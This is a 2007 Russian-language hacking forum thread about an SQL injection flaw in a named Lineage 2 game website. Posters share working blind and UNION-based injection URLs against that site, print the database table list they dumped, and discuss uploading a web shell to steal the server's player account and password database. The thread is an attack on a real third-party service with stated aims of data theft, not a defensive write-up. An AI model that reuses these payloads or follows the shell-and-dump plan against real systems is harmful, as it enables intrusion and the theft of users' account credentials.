Wnet

Discussion in 'Уязвимости' started by l1ght, 4 Jul 2007.

  1. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    192
    Likes Received:
    675
    Reputations:
    333
    все таки одна скуля нашлась=)
    Code:
    http://lineage2.wnet.ua/library/l2dp/item.php?id=2+AND+ascii(lower(substring(version(),1,1)))=53/* 5
    http://lineage2.wnet.ua/library/l2dp/item.php?id=2+AND+ascii(lower(substring(version(),2,1)))=46/* .
    http://lineage2.wnet.ua/library/l2dp/item.php?id=2+AND+ascii(lower(substring(version(),3,1)))=49/* 1
    http://lineage2.wnet.ua/library/l2dp/item.php?id=2+AND+ascii(lower(substring(version(),4,1)))=46/* .
    http://lineage2.wnet.ua/library/l2dp/item.php?id=2+AND+ascii(lower(substring(version(),5,1)))=49/* 1
    http://lineage2.wnet.ua/library/l2dp/item.php?id=2+AND+ascii(lower(substring(version(),6,1)))=54/* 6
    http://lineage2.wnet.ua/library/l2dp/item.php?id=2+and(1=(select+1))/*
    gratz constantine.
     
    #1 l1ght, 4 Jul 2007
    Last edited: 2 Mar 2009
    5 people like this.
  2. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    799
    Likes Received:
    710
    Reputations:
    301
    А чего так криво)) связка операторов union+select вполне функционирует
    Code:
    http://lineage2.wnet.ua/library/l2dp/item.php?id=-1+Union+select+1,2,3,version()/*
    Какие то такие запросы будут получаться, инфу вывести не сложно
    Code:
    http://lineage2.wnet.ua/library/l2dp/item.php?id=-1+Union+select+1,2,3,column_name+from+information_schema.columns+where+table_name=0x4e7063496e666f/*
     
    3 people like this.
  3. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,675
    Likes Received:
    1,028
    Reputations:
    1,228
    тока никто не учёл такую вещь как user()=L2db@localhost => доступные таблицы это тока те которые относятся к справочной базе=\
    Code:
    CHARACTER_SETS
    COLLATIONS
    COLLATION_CHARACTER_SET_APPLICABILITY
    COLUMNS
    COLUMN_PRIVILEGES
    ENGINES
    EVENTS
    FILES
    GLOBAL_STATUS
    GLOBAL_VARIABLES
    KEY_COLUMN_USAGE
    PARTITIONS
    PLUGINS
    PROCESSLIST
    REFERENTIAL_CONSTRAINTS
    ROUTINES
    SCHEMATA
    SCHEMA_PRIVILEGES
    SESSION_STATUS
    SESSION_VARIABLES
    STATISTICS
    TABLES
    TABLE_CONSTRAINTS
    TABLE_PRIVILEGES
    TRIGGERS
    USER_PRIVILEGES
    VIEWS
    Armor
    ClassStats
    Classes
    DropLog
    Drops
    Dropsl2db
    EtcItems
    GainSkills
    GainSkillsLog
    IngredientLog
    Ingredients
    Ingredientsl2db
    ItemNames
    Items
    Locations
    Monsters
    NpcInfo
    NpcLog
    NpcNames
    QuestDetailLog
    QuestDetails
    QuestLog
    QuestNames
    Quests
    RecipeLog
    Recipes
    Recipesl2db
    SetItems
    Sets
    SkillNames
    Skills
    Stores
    SysStrings
    Teleports
    Weapons
     
    _________________________
    1 person likes this.
  4. Серенький

    Joined:
    13 Apr 2007
    Messages:
    113
    Likes Received:
    145
    Reputations:
    83
    xss. ';/ фильтруются
     
    2 people like this.
  5. helat

    helat Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    168
    Likes Received:
    45
    Reputations:
    5
    ТС Базу юзеров ты не сдапиш.
    Так как линейка хранит не в мускул а вроде в мсскл
     
  6. Extremal

    Extremal Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    66
    Likes Received:
    85
    Reputations:
    10
    если реч идет о слити данных об акках которые стоят на етом сервере,то я незнаю как етот сервак но я много серваков ставил(у себя на компе)))и все они были на mysql ;)
    и вобще с чего вы взяли что базы етого сервака будут на етом сайте???сервак то наверняка стоит у них на компе...
     
    #6 Extremal, 5 Jul 2007
    Last edited: 5 Jul 2007
  7. M0rgan

    M0rgan New Member

    Joined:
    4 Jul 2007
    Messages:
    25
    Likes Received:
    3
    Reputations:
    0
    Офф на МайСкюл?
    какие серваки ты ставил? может явы...
    внет считается одним из топ УА сервов ла2...
    то что там БД не Мумкул (от серва) гарантирую
    +Гмы не настолько там тупы (с виду =))) )
    было у мну дело тоже с оффом
    вроде все было и уже пассы и доступ... скрипта на "легкое слитие бд" небыло
    с МССКЮЛОМ не дружил (увы (( ) да и щас не дружу... так слить базу пассов не удалось...
    база с сервом стоят в офисе (хз что и как настроено)
    теоретически можно попробовать какимто раком залить шелл (не судите строго не оч разбираюсь)
    там уже в конфигурациях или даже просто в файлах (админы любят пассы хранить в текстовиках на роб. столе) узнать все пассы (доступ, назв. баз и тд)
    ну а там думать )

    строго не судите пост
    02.00
     
  8. Extremal

    Extremal Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    66
    Likes Received:
    85
    Reputations:
    10
    да ты прав я ставил ява серваки...но етот сервак 100% не офф так что база наверняка в мускуле...и если вся база о аккуантах тоже наверняка храниться у них на компе...так что если хотите слить базу нужно пытаться конектиться к кмопу или че то типа етого(я просто представления не имею как ето сделать...)=)т.к. на сайте об базах сервака точно ни че нету
     
    #8 Extremal, 6 Jul 2007
    Last edited: 6 Jul 2007
  9. M0rgan

    M0rgan New Member

    Joined:
    4 Jul 2007
    Messages:
    25
    Likes Received:
    3
    Reputations:
    0
    слуш почему ты так уверен что это ява то? )
    вот сколько лет уже его почемуто оффом называют...
    я говорю не к тому чтоб обидеть или еще что-то но просто внет явой быть ну никак не может...
    и ставил его поверь мне не ребенок, серв профисиональный,
    явы так обычно не работают много показателей...
    хотя хз они недавно переезжали вроде, в общем просто хотелось бы услышать почему он ява... просто все время считал его оффом...

    сомневаюсь очень крайне что он на мускуле...
    ты хоть раз ставил офф?
    еще раз вопрос - откуда такие сравнения?
    ---
     
  10. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    Офф на каждом втором серваке сейчас стоит, слили все, кому не лень
    По поводу базы: да, в офф-версиях используется Mssql, причем адрес игрового сервера редко совпадает с адресом сервера, где находится/хостится сайт.
     
  11. M0rgan

    M0rgan New Member

    Joined:
    4 Jul 2007
    Messages:
    25
    Likes Received:
    3
    Reputations:
    0
    таки да
    но... теоретически залив шелл все равно можно найти данные о серве и БД самой игры...
    но достаточно геморно...
     
  12. M0rgan

    M0rgan New Member

    Joined:
    4 Jul 2007
    Messages:
    25
    Likes Received:
    3
    Reputations:
    0
    просто шелл еще достаточно палевно...
    можно еще какимто способом бд слить?